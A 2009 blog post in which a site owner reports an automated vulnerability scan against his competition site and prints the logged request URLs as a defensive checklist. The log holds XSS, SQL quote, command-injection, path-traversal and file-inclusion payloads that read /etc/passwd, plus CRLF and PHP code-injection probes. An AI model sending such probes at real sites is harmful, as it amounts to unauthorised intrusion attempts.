Injection attempts against the MilliNet site

November 22, 2009

From the day the competition started I had a small logging system running on the site. I was curious what kinds of attacks would be made against it, or rather, whether any would be made at all. The logger mainly inspects the request URL and records injection attempts made through it.

From 22 October on, minor probing attempts hit the site almost every day. Some put a space into one of the URL variables, others some random character. None of that was very interesting.

On 20 November several injection attempts came one after another from the IP 193.135.156.253. According to http://www.ip2location.com/ this is a Swiss address. The first thing that came to mind was "what would the Swiss want with the MilliNet competition?", but as the old men used to say, "a curse on the white snake and the black one alike".

Earlier minor attempts had also come from IPs in various countries, but the one from Switzerland was more interesting. It starts at 11:38 in the morning and runs for roughly a quarter of an hour (the entries below span 11:38 to 11:50), with a new variant tried about every two seconds. That cadence alone points to an automated tool rather than someone typing by hand, and the payloads confirm it: the markers acunetix_wvs_security_test and injected_by_wvs are the strings Acunetix Web Vulnerability Scanner (WVS) puts into its test requests, and the scanner later probes with its own hosts (www.acunetix.com, testphp.acunetix.com). So this was a full automated scan of the sec, id and mid parameters, covering XSS (the alert(...) payloads), single-quote, double-quote and parenthesis probes for SQL errors, OS command injection (cat /etc/passwd behind &, ;, |, backticks and newlines), directory traversal and local file inclusion (../../etc/passwd, the .\./ variant, a bare /etc/passwd), remote file inclusion (URLs to non-existent hosts), CRLF header and Set-Cookie injection, and PHP code injection (printf(md5(...));exit;//).
Naturally, every attempt failed, but the list is a useful checklist of what a scanner will throw at your own site, so you can put defences in place ahead of time. One caveat when reading the log: the blog's display has most likely dropped the HTML tags from some entries, which is why several payloads appear as a bare alert(...) call, a stray t>, or an empty sec= value; the requests the scanner actually sent were longer than what is shown.


20:11:2009 11:38:23 ==> index.php?sec=alert(828920777)%3B&id=10
20:11:2009 11:38:23 ==> index.php?sec=alert(814598898)%3B&id=10
20:11:2009 11:38:25 ==> index.php?sec=alert(155724332)%3B
20:11:2009 11:38:25 ==> index.php?sec=alert(428590302)%3B
20:11:2009 11:38:26 ==> index.php?sec=comment&id=alert(2063466684)%3B
20:11:2009 11:38:30 ==> index.php?sec='
20:11:2009 11:38:30 ==> index.php?sec='
20:11:2009 11:38:30 ==> index.php?sec='&id=10
20:11:2009 11:38:31 ==> index.php?sec='&id=10
20:11:2009 11:38:31 ==> index.php?sec=comment&id='
20:11:2009 11:38:31 ==> index.php?sec=comment&id='
20:11:2009 11:38:32 ==> index.php?sec=comment&id=alert(1296005040)%3B
20:11:2009 11:38:32 ==> index.php?sec=comment&id=alert(92331127)%3B
20:11:2009 11:38:34 ==> index.php?sec=comment&id='
20:11:2009 11:38:35 ==> index.php?sec=+%26cat+/etc/passwd%26
20:11:2009 11:38:35 ==> index.php?sec=+%26cat+/etc/passwd%26
20:11:2009 11:38:36 ==> index.php?sec=+%26cat+/etc/passwd%26&id=10
20:11:2009 11:38:36 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:37 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:37 ==> index.php?sec=comment&id=+%26cat+/etc/passwd%26
20:11:2009 11:38:41 ==> index.php?sec=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=../../../../../../../../etc/passwd&id=10
20:11:2009 11:38:42 ==> index.php?sec=../../../../../../../../etc/passwd&id=10
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:42 ==> index.php?sec=comment&id=../../../../../../../../etc/passwd
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&id=10
20:11:2009 11:38:48 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&id=10
20:11:2009 11:38:49 ==> index.php?sec=comment&id=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:49 ==> index.php?sec=comment&id=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:49 ==> index.php?sec=../../../../../../../../etc/passwd
20:11:2009 11:38:53 ==> index.php?sec=
20:11:2009 11:38:53 ==> index.php?sec=
20:11:2009 11:38:54 ==> index.php?sec=&id=10
20:11:2009 11:38:54 ==> index.php?sec=&id=10
20:11:2009 11:38:54 ==> index.php?sec=comment&id=
20:11:2009 11:38:54 ==> index.php?sec=comment&id=
20:11:2009 11:38:56 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:38:57 ==> index.php?sec=+%26cat+/etc/passwd%26&id=10
20:11:2009 11:38:58 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&id=10
20:11:2009 11:38:59 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&id=10
20:11:2009 11:39:00 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:03 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:09 ==> index.php?sec=comment&id=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:10 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&id=10
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:11 ==> index.php?sec=comment&id=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:39:13 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&id=10
20:11:2009 11:39:15 ==> index.php?sec=comment&id=
20:11:2009 11:39:16 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:16 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:17 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:39:17 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:18 ==> index.php?sec=comment&id=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:39:23 ==> index.php?sec='&id=10
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:23 ==> index.php?sec=comment&id='
20:11:2009 11:39:25 ==> index.php?sec='
20:11:2009 11:39:25 ==> index.php?sec='&id=10
20:11:2009 11:39:27 ==> index.php?sec='
20:11:2009 11:39:27 ==> index.php?sec='
20:11:2009 11:39:27 ==> index.php?sec='&id=10
20:11:2009 11:39:28 ==> index.php?sec='&id=10
20:11:2009 11:39:28 ==> index.php?sec=comment&id='
20:11:2009 11:39:30 ==> index.php?sec='
20:11:2009 11:39:31 ==> index.php?sec=comment&id='
20:11:2009 11:39:31 ==> index.php?sec=comment&id='
20:11:2009 11:39:32 ==> index.php?sec=)
20:11:2009 11:39:32 ==> index.php?sec=)&id=10
20:11:2009 11:39:33 ==> index.php?sec=comment&id=)
20:11:2009 11:39:33 ==> index.php?sec=comment&id=)
20:11:2009 11:39:35 ==> index.php?sec=)
20:11:2009 11:39:35 ==> index.php?sec=comment&id=)
20:11:2009 11:39:35 ==> index.php?sec=)&id=10
20:11:2009 11:39:37 ==> index.php?sec=
20:11:2009 11:39:38 ==> index.php?sec=&id=10
20:11:2009 11:39:38 ==> index.php?sec=&id=10
20:11:2009 11:39:38 ==> index.php?sec=comment&id=
20:11:2009 11:39:38 ==> index.php?sec=comment&id=
20:11:2009 11:39:39 ==> index.php?sec=comment&id=
20:11:2009 11:39:39 ==> index.php?sec=
20:11:2009 11:39:41 ==> index.php?sec=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=http://www.acunetix.com&id=10
20:11:2009 11:39:43 ==> index.php?sec=http://www.acunetix.com&id=10
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:43 ==> index.php?sec=comment&id=http://www.acunetix.com
20:11:2009 11:39:44 ==> index.php?sec=http://www.acunetix.com
20:11:2009 11:40:14 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:14 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:15 ==> index.php?sec=comment&mid=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs
20:11:2009 11:40:17 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&mid=10
20:11:2009 11:40:23 ==> index.php?sec=%0d%0aSomeCustomInjectedHeader%3Ainjected_by_wvs&mid=10
20:11:2009 11:40:34 ==> index.php?sec=&mid=10
20:11:2009 11:40:34 ==> index.php?sec=comment&mid=
20:11:2009 11:40:34 ==> index.php?sec=comment&mid=
20:11:2009 11:40:34 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:40:36 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&id=10
20:11:2009 11:40:36 ==> index.php?sec=&mid=10
20:11:2009 11:40:37 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:40:38 ==> index.php?sec=http://www.acunetix.com&mid=10
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:38 ==> index.php?sec=comment&mid=http://www.acunetix.com
20:11:2009 11:40:40 ==> index.php?sec=alert(1526387126)%3B&mid=10
20:11:2009 11:40:40 ==> index.php?sec=comment&mid=alert(1690613397)%3B
20:11:2009 11:40:40 ==> index.php?sec=>'>alert(356721300)%3B
20:11:2009 11:40:41 ==> index.php?sec=>'>alert(865097347)%3B&id=10
20:11:2009 11:40:43 ==> index.php?sec=alert(1257441162)%3B&mid=10
20:11:2009 11:40:43 ==> index.php?sec=comment&mid=
20:11:2009 11:40:46 ==> index.php?sec=http://www.acunetix.com&mid=10
20:11:2009 11:40:48 ==> index.php?sec=comment&mid=alert(1252845805)%3B
20:11:2009 11:40:48 ==> index.php?sec=comment&mid=alert(1492092584)%3B
20:11:2009 11:40:49 ==> index.php?sec=>'>alert(891277443)%3B
20:11:2009 11:40:50 ==> index.php?sec='&mid=10
20:11:2009 11:40:51 ==> index.php?sec='&mid=10
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=comment&mid='
20:11:2009 11:40:51 ==> index.php?sec=%27
20:11:2009 11:40:51 ==> index.php?sec=%27
20:11:2009 11:40:52 ==> index.php?sec=%27&id=10
20:11:2009 11:40:57 ==> index.php?sec=../../../../../../../../etc/passwd&mid=10
20:11:2009 11:40:57 ==> index.php?sec=../../../../../../../../etc/passwd&mid=10
20:11:2009 11:40:57 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=+%26cat+/etc/passwd%26&mid=10
20:11:2009 11:41:00 ==> index.php?sec=+%26cat+/etc/passwd%26&mid=10
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=../../../../../../../../etc/passwd
20:11:2009 11:41:00 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=comment&mid=+%26cat+/etc/passwd%26
20:11:2009 11:41:03 ==> index.php?sec=+%0acat+/etc/passwd%0a
20:11:2009 11:41:03 ==> index.php?sec=+%0acat+/etc/passwd%0a
20:11:2009 11:41:04 ==> index.php?sec=+%0acat+/etc/passwd%0a&id=10
20:11:2009 11:41:04 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:05 ==> index.php?sec=comment&mid=http://some-inexistent-website.com/some_inexistent_file_with_long_name
20:11:2009 11:41:06 ==> index.php?sec=/some_inexistent_file_with_long_name
20:11:2009 11:41:06 ==> index.php?sec=/some_inexistent_file_with_long_name&id=10
20:11:2009 11:41:06 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&mid=10
20:11:2009 11:41:06 ==> index.php?sec=http://www.acunetix-long-name-with-some-inexistent-host.com/&mid=10
20:11:2009 11:41:06 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:06 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:07 ==> index.php?sec=comment&mid=http://www.acunetix-long-name-with-some-inexistent-host.com/
20:11:2009 11:41:08 ==> index.php?sec=http://some-inexistent-website.com/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:41:08 ==> index.php?sec=&mid=10
20:11:2009 11:41:08 ==> index.php?sec=&mid=10
20:11:2009 11:41:08 ==> index.php?sec=/some_inexistent_file_with_long_name
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:08 ==> index.php?sec=comment&mid=
20:11:2009 11:41:09 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=comment&mid=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:09 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:41:10 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:41:12 ==> index.php?sec=printf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:41:16 ==> index.php?sec='&mid=10
20:11:2009 11:41:17 ==> index.php?sec=comment&mid='
20:11:2009 11:41:17 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec='&mid=10
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=comment&mid='
20:11:2009 11:41:18 ==> index.php?sec=)&mid=10
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:18 ==> index.php?sec=comment&mid=)
20:11:2009 11:41:19 ==> index.php?sec='&mid=10
20:11:2009 11:41:20 ==> index.php?sec=comment&mid='
20:11:2009 11:41:20 ==> index.php?sec='&mid=10
20:11:2009 11:41:21 ==> index.php?sec=)&mid=10
20:11:2009 11:41:25 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&mid=10
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:26 ==> index.php?sec=comment&mid=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:28 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&id=10
20:11:2009 11:41:28 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:28 ==> index.php?sec=comment&id=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue
20:11:2009 11:41:29 ==> index.php?sec=%0d%0aSet-Cookie%3A%20cookiename%3Dcookievalue&mid=10
20:11:2009 11:42:12 ==> index.php?sec=>'>alert(22094292)%3B&id=10
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(313490729)%3B
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(256038863)%3B
20:11:2009 11:42:12 ==> index.php?sec=comment&id=>'>alert(34961168)%3B
20:11:2009 11:42:13 ==> index.php?sec=>'>alert(909768351)%3B&mid=10
20:11:2009 11:42:13 ==> index.php?sec=comment&mid=>'>alert(1092862869)%3B
20:11:2009 11:42:13 ==> index.php?sec=comment&mid=>'>alert(1131569076)%3B
20:11:2009 11:42:15 ==> index.php?sec=%27&id=10
20:11:2009 11:42:15 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:15 ==> index.php?sec=%27&mid=10
20:11:2009 11:42:15 ==> index.php?sec=%27&mid=10
20:11:2009 11:42:16 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:16 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:16 ==> index.php?sec=>'>alert(591925021)%3B&mid=10
20:11:2009 11:42:18 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:18 ==> index.php?sec=comment&mid=%27
20:11:2009 11:42:18 ==> index.php?sec=comment&id=%27
20:11:2009 11:42:27 ==> index.php?sec=/some_inexistent_file_with_long_name&id=10
20:11:2009 11:42:27 ==> index.php?sec=comment&id=/some_inexistent_file_with_long_name
20:11:2009 11:42:27 ==> index.php?sec=comment&id=/some_inexistent_file_with_long_name
20:11:2009 11:42:27 ==> index.php?sec=/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:42:28 ==> index.php?sec=/some_inexistent_file_with_long_name&mid=10
20:11:2009 11:42:28 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:28 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:28 ==> index.php?sec=+%0acat+/etc/passwd%0a&id=10
20:11:2009 11:42:29 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:29 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:29 ==> index.php?sec=+%0acat+/etc/passwd%0a&mid=10
20:11:2009 11:42:30 ==> index.php?sec=+%0acat+/etc/passwd%0a&mid=10
20:11:2009 11:42:30 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:30 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:30 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=comment&mid=/some_inexistent_file_with_long_name
20:11:2009 11:42:31 ==> index.php?sec=comment&id=+%0acat+/etc/passwd%0a
20:11:2009 11:42:31 ==> index.php?sec=comment&id=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:42:31 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:31 ==> index.php?sec=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:42:32 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:42:33 ==> index.php?sec=comment&mid=+%0acat+/etc/passwd%0a
20:11:2009 11:42:35 ==> index.php?sec=comment&mid=%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:27 ==> index.php?sec=%2527
20:11:2009 11:43:27 ==> index.php?sec=%2527
20:11:2009 11:43:28 ==> index.php?sec=%2527&id=10
20:11:2009 11:43:28 ==> index.php?sec=%2527&id=10
20:11:2009 11:43:28 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:28 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:31 ==> index.php?sec=comment&id=%2527
20:11:2009 11:43:32 ==> index.php?sec=>">alert(2112528622)%3B
20:11:2009 11:43:32 ==> index.php?sec=>">alert(1879597226)%3B
20:11:2009 11:43:32 ==> index.php?sec=>">alert(1838808769)%3B&id=10
20:11:2009 11:43:33 ==> index.php?sec=comment&id=>">alert(2057693447)%3B
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:33 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:43:34 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:43:34 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:34 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:35 ==> index.php?sec=comment&id=>">alert(1553532672)%3B
20:11:2009 11:43:35 ==> index.php?sec=comment&id=>">alert(2040900903)%3B
20:11:2009 11:43:36 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&id=10
20:11:2009 11:43:37 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&id=10
20:11:2009 11:43:37 ==> index.php?sec=comment&id='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:43:37 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:37 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60&id=10
20:11:2009 11:43:38 ==> index.php?sec=%60cat+/etc/passwd%60&id=10
20:11:2009 11:43:38 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:43:38 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:43:40 ==> index.php?sec=comment&id=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:43:40 ==> index.php?sec=%60cat+/etc/passwd%60
20:11:2009 11:43:40 ==> index.php?sec=>">alert(359809996)%3B&id=10
20:11:2009 11:43:41 ==> index.php?sec=comment&id=%60cat+/etc/passwd%60
20:11:2009 11:44:13 ==> index.php?sec=%2527&mid=10
20:11:2009 11:44:13 ==> index.php?sec=%2527&mid=10
20:11:2009 11:44:13 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:13 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:13 ==> index.php?sec="
20:11:2009 11:44:14 ==> index.php?sec="
20:11:2009 11:44:14 ==> index.php?sec="&id=10
20:11:2009 11:44:15 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&mid=10
20:11:2009 11:44:15 ==> index.php?sec=http://testphp.acunetix.com/acunetix_file_inclusion_test?&mid=10
20:11:2009 11:44:15 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:15 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:16 ==> index.php?sec=comment&mid=http://testphp.acunetix.com/acunetix_file_inclusion_test?
20:11:2009 11:44:16 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec=comment&mid='%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:16 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:17 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:17 ==> index.php?sec=%60cat+/etc/passwd%60&mid=10
20:11:2009 11:44:17 ==> index.php?sec=%60cat+/etc/passwd%60&mid=10
20:11:2009 11:44:17 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:18 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:18 ==> index.php?sec=cat+/etc/passwd&id=10
20:11:2009 11:44:19 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=%60cat+/etc/passwd%60
20:11:2009 11:44:20 ==> index.php?sec=>">alert(915487236)%3B&mid=10
20:11:2009 11:44:20 ==> index.php?sec=>">alert(1793635864)%3B&mid=10
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=>">alert(289191039)%3B
20:11:2009 11:44:20 ==> index.php?sec=comment&mid=>">alert(1195476607)%3B
20:11:2009 11:44:21 ==> index.php?sec=comment&mid=>">alert(1705370242)%3B
20:11:2009 11:44:21 ==> index.php?sec=comment&mid=%2527
20:11:2009 11:44:21 ==> index.php?sec=cat+/etc/passwd
20:11:2009 11:44:21 ==> index.php?sec=cat+/etc/passwd
20:11:2009 11:44:21 ==> index.php?sec=alert(1693522596)%3B&id=10
20:11:2009 11:44:23 ==> index.php?sec=alert(1571845125)%3B
20:11:2009 11:44:24 ==> index.php?sec=alert(910874829)%3B
20:11:2009 11:44:50 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:44:50 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:44:53 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&id=10
20:11:2009 11:44:56 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:44:56 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=comment&id=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:57 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:57 ==> index.php?sec=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:44:57 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec=comment&mid=1%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:44:58 ==> index.php?sec="&id=10
20:11:2009 11:44:58 ==> index.php?sec=comment&id="
20:11:2009 11:44:58 ==> index.php?sec=comment&id="
20:11:2009 11:44:58 ==> index.php?sec="&mid=10
20:11:2009 11:44:59 ==> index.php?sec="&mid=10
20:11:2009 11:44:59 ==> index.php?sec=comment&mid="
20:11:2009 11:44:59 ==> index.php?sec=comment&mid="
20:11:2009 11:44:59 ==> index.php?sec=comment&id="
